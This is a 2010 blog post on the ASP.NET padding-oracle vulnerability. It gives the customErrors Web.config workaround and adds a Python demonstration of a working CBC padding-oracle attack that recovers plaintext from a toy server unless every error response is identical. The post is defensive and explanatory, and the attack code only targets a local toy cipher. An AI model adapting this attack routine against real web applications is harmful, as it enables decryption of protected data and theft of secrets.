posted 9/18/2010 by Hajan Selmani
Scott Guthrie, on his ASP.NET weblog, has written about a serious security flaw in ASP.NET that was publicly disclosed yesterday, 17 September 2010.
Today, Microsoft has also released a Microsoft Security Advisory that describes the flaw and the workaround for it.
What does this vulnerability enable?
Scott Guthrie on his blog says: "An attacker using this vulnerability can request and download files within an ASP.NET Application like the web.config file (which often contains sensitive data). An attacker exploiting this vulnerability can also decrypt data sent to the client in an encrypted state (like ViewState data within a page)." (Reference: Scott Guthrie's blog)
The workaround is simple and you can apply it right now: modify your application's Web.config so that customErrors is enabled and every error, whatever its cause, returns the same generic page. This matters because the attack depends on telling apart the error ASP.NET returns for bad encryption padding from the errors it returns for other failures; once every failure looks identical, the responses give the attacker nothing to learn from. Add the following inside <system.web>:
For ASP.NET 1.0 through 3.5 (before SP1) - <customErrors mode="On" defaultRedirect="~/error.html" />
For ASP.NET 3.5 SP1 and ASP.NET 4.0 - <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.html" />
Two caveats. First, redirectMode="ResponseRewrite" (available from 3.5 SP1) serves the error page in place instead of issuing an HTTP redirect, so the status code and body are the same for every error; use it wherever the framework supports it. Second, do not add per-status <error statusCode="..." /> sub-elements to customErrors, because pointing different errors at different pages reintroduces exactly the difference the attacker is looking for. Scott's post additionally recommends a short random delay in the error page to mask timing differences. This is a workaround, not a fix: apply Microsoft's patch as soon as it ships.
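To show why one uniform error page defeats the attack, here is an added example that is not code from the original post and has nothing to do with ASP.NET internals: a toy server that CBC-decrypts a client-supplied blob (standing in for ViewState) and then checks a MAC, and an attacker that runs a CBC padding-oracle attack against it. With distinct error messages the attacker recovers the plaintext byte by byte; with one identical error response the same attacker gets nowhere. The block cipher is a small keyed Feistel network, an assumption made so that the script needs only the Python standard library; the attack works identically against AES.

```python
# Added example, not from the original post and not ASP.NET code. A toy server
# decrypts a client blob (think ViewState) and checks a MAC; an attacker runs a
# CBC padding-oracle attack against it. The block cipher is a small keyed
# Feistel network, assumed here so that only the standard library is needed.
import hashlib, hmac, os

BLOCK, TAG = 16, 32  # CBC block size; length of the HMAC-SHA256 tag on the plaintext

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # keyed round function, 8-byte output
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_cipher(key, block, decrypt=False):
    # 4-round Feistel network; decryption swaps halves, reverses rounds, swaps back
    l, r = (block[8:], block[:8]) if decrypt else (block[:8], block[8:])
    for rnd in (range(3, -1, -1) if decrypt else range(4)):
        l, r = r, xor(l, _f(key, rnd, r))
    return r + l if decrypt else l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("padding is invalid")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_cipher(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(block_cipher(key, ct[i:i + BLOCK], decrypt=True), prev)
        prev = ct[i:i + BLOCK]
    return out

def make_server(key, mac_key, uniform_errors):
    # The application: decrypt the submitted blob, then verify its MAC.
    # uniform_errors=False: bad padding and bad MAC give different responses.
    # uniform_errors=True: every failure gives one identical response (customErrors).
    def error(detail):
        return (500, "An error occurred") if uniform_errors else (500, detail)
    def handle(iv, ct):
        try:
            pt = unpad(cbc_decrypt(key, iv, ct))
        except ValueError:
            return error("padding is invalid")
        body, tag = pt[:-TAG], pt[-TAG:]
        if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
            return error("MAC check failed")
        return (200, "OK")
    return handle

def recover_block(handle, block, real_prev):
    # Recover one block's plaintext via the oracle "response is not the padding
    # error". Returns None when no single guess per byte stands out, i.e. when
    # the server gives the attacker nothing to distinguish.
    def padding_ok(prev):
        return handle(bytes(prev), block) != (500, "padding is invalid")
    inter = bytearray(BLOCK)  # the block's raw decryption, learned byte by byte
    for k in range(1, BLOCK + 1):  # aim for padding value k, last byte first
        pos, hits = BLOCK - k, []
        for g in range(256):
            crafted = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                crafted[j] = inter[j] ^ k  # known bytes forced to decrypt to k
            crafted[pos] = g
            if not padding_ok(crafted):
                continue
            if k == 1:  # rule out an accidental 0x02 0x02 (or longer) match
                crafted[pos - 1] ^= 0xFF
                if not padding_ok(crafted):
                    continue
            hits.append(g)
        if len(hits) != 1:
            return None
        inter[pos] = hits[0] ^ k
    return xor(bytes(inter), real_prev)

def recover_plaintext(handle, iv, ct):
    chain = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    out = b""
    for prev, cur in zip(chain, chain[1:]):
        pt = recover_block(handle, cur, prev)
        if pt is None:
            return None
        out += pt
    return unpad(out)[:-TAG]  # drop the padding and the MAC tag

def demo(uniform_errors, secret=b"user=admin;role=1"):
    # Constructed sample: fresh random keys, the secret plus its MAC, CBC-encrypted.
    key, mac_key, iv = os.urandom(16), os.urandom(16), os.urandom(BLOCK)
    tag = hmac.new(mac_key, secret, hashlib.sha256).digest()
    ct = cbc_encrypt(key, iv, pad(secret + tag))
    return recover_plaintext(make_server(key, mac_key, uniform_errors), iv, ct)
```

demo(False) returns the secret without the attacker ever holding the key, after roughly 256 requests per plaintext byte; demo(True) returns None because every guess draws the same "An error occurred" response. Note that the uniform server still validates the MAC, so legitimate requests are unaffected; only the information leaked on failure changes, which is all the Web.config workaround above changes too.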
From the comments I've seen on Scott's blog, this security flaw impacts SharePoint too.
List of other blogs 'talking' about this security flaw:
- http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
- http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx
- http://stevesmithblog.com/blog/asp-net-custom-errors-security-flaw/
If you have anything to ask, please do not hesitate to do so.
Kind Regards,
Hajan